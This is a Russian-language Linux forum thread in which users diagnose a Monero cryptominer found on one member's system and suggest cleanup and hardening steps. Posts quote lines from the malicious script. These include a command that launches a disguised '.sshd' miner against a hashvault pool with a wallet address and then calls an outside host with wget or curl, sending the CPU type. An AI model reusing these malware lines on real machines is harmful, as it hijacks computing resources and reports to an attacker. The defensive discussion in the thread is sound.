Взломали систему

pavelchavyr	# 4 года, 7 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Да, оно самое. Причем по данным whois домены из скриптика зарегистрированы 9 января 2018 года, так что у меня он тоже недавно.

R.V.	# 4 года, 7 месяцев назад
Темы: 11 Сообщения: 1100 Участник с: 10 января 2017	RusWolf А у меня wget даже не установлен. А у меня крона даже нет. genues Намного важнее определить источник заражения и принять меры. +++

R.V.

# 4 года, 7 месяцев назад

Темы: 11

Сообщения: 1100

Участник с: 10 января 2017

RusWolf
А у меня wget даже не установлен.

А у меня крона даже нет.

genues
Намного важнее определить источник заражения и принять меры.

+++

nafanja	# 4 года, 7 месяцев назад
Темы: 94 Сообщения: 9252 Участник с: 02 июня 2012 заблокирован	RusWolf А у меня wget даже не установлен. нет wget, будет использоваться curl... pavelchavyr Вот как раз источник заражения меня и беспокоит, так как не могу его выявить поискать internetresearch во всех файлах в домашней папке не пробовал? Псевдографический инсталлятор Arch Linux ver. 3.8.2 Благодарности принимаются на ЯД 410012815723874

nafanja

# 4 года, 7 месяцев назад

Темы: 94

Сообщения: 9252

Участник с: 02 июня 2012

заблокирован

RusWolf
А у меня wget даже не установлен.

нет wget, будет использоваться curl...

pavelchavyr
Вот как раз источник заражения меня и беспокоит, так как не могу его выявить

поискать internetresearch во всех файлах в домашней папке не пробовал?

Псевдографический инсталлятор Arch Linux ver. 3.8.2
Благодарности принимаются на ЯД 410012815723874

vs220	# 4 года, 7 месяцев назад
Темы: 22 Сообщения: 8070 Участник с: 16 августа 2009	nafanja поискать internetresearch Заодно и исполняемые файлы проверить `find . -type f -perm /u+x -print` можно вообще домашнюю с noexec, nosuid монтировать

vs220

# 4 года, 7 месяцев назад

Темы: 22

Сообщения: 8070

Участник с: 16 августа 2009

nafanja
поискать internetresearch

Заодно и исполняемые файлы проверить

find . -type f -perm /u+x -print

можно вообще домашнюю с noexec, nosuid монтировать

pavelchavyr	# 4 года, 7 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Файлы поискал, ничего не нашел. Лог крона говорит, что заражение произошло 8 января.

vasek	# 4 года, 7 месяцев назад
Темы: 48 Сообщения: 11321 Участник с: 17 февраля 2013	pavelchavyr pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8') По идее 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' - это имя процесса проверь запущен ли процесс $ pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' ......... пусто ......... $ pgrep -f 'firefox' 494 pavelchavyr pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8') test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' \| grep -vw $pid \| xargs -r kill -9 pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0 Если запустить такой скрипт, но вместо tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 вписать firefox, то на выходе будет тот же pid = 494 И это один в один совпадает со ссылкой, указанной corner - имхо, ищется pid этого процесса, а вот что это за внедренный процесс и что он делает - непонятно. Ошибки не исчезают с опытом - они просто умнеют

vasek

# 4 года, 7 месяцев назад

Темы: 48

Сообщения: 11321

Участник с: 17 февраля 2013

pavelchavyr
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')

По идее 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' - это имя процесса
проверь запущен ли процесс
$ pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8'
......... пусто .........
$ pgrep -f 'firefox'
494

pavelchavyr
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' | grep -vw $pid | xargs -r kill -9
pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0

Если запустить такой скрипт, но вместо tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 вписать firefox, то на выходе будет тот же pid = 494
И это один в один совпадает со ссылкой, указанной corner - имхо, ищется pid этого процесса, а вот что это за внедренный процесс и что он делает - непонятно.

Ошибки не исчезают с опытом - они просто умнеют

pavelchavyr	# 4 года, 7 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Это майнер. Скрипт проверяет, запущен он или нет.

vasek	# 4 года, 7 месяцев назад
Темы: 48 Сообщения: 11321 Участник с: 17 февраля 2013	pavelchavyr Это майнер. Скрипт проверяет, запущен он или нет. Понятно - так оно и выходит. Но вот что это за код, так и не понятно. Но внедриться он мог скорее всего из-за слабого пароля. У меня пароли не менее 20 знаков с тремя уровнями - но заточены так, что вспомнить могу всегда, даже среди ночи. Ошибки не исчезают с опытом - они просто умнеют

vasek

# 4 года, 7 месяцев назад

Темы: 48

Сообщения: 11321

Участник с: 17 февраля 2013

pavelchavyr
Это майнер. Скрипт проверяет, запущен он или нет.

Понятно - так оно и выходит.
Но вот что это за код, так и не понятно. Но внедриться он мог скорее всего из-за слабого пароля.
У меня пароли не менее 20 знаков с тремя уровнями - но заточены так, что вспомнить могу всегда, даже среди ночи.

Ошибки не исчезают с опытом - они просто умнеют

pavelchavyr	# 4 года, 7 месяцев назад (отредактировано 4 года, 7 месяцев назад)
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Это часть имени пользователя монеро. Дальше в коде можно увидеть его полный логин, в последних двух строчках. `pgrep -f hashvault\|\|./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B\|\|wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"\|\|curl http://lochjol.com/FAIL --user-agent "$(uname -p)"`

pavelchavyr

# 4 года, 7 месяцев назад (отредактировано 4 года, 7 месяцев назад)

Темы: 25

Сообщения: 248

Участник с: 25 января 2011

Это часть имени пользователя монеро. Дальше в коде можно увидеть его полный логин, в последних двух строчках.

pgrep -f hashvault||./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"||curl http://lochjol.com/FAIL --user-agent "$(uname -p)"

pavelchavyr	# 4 года, 7 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Я тоже склоняюсь к версии со слабым паролем. Вот только почему в логах нет записи о входе с левого айпишника?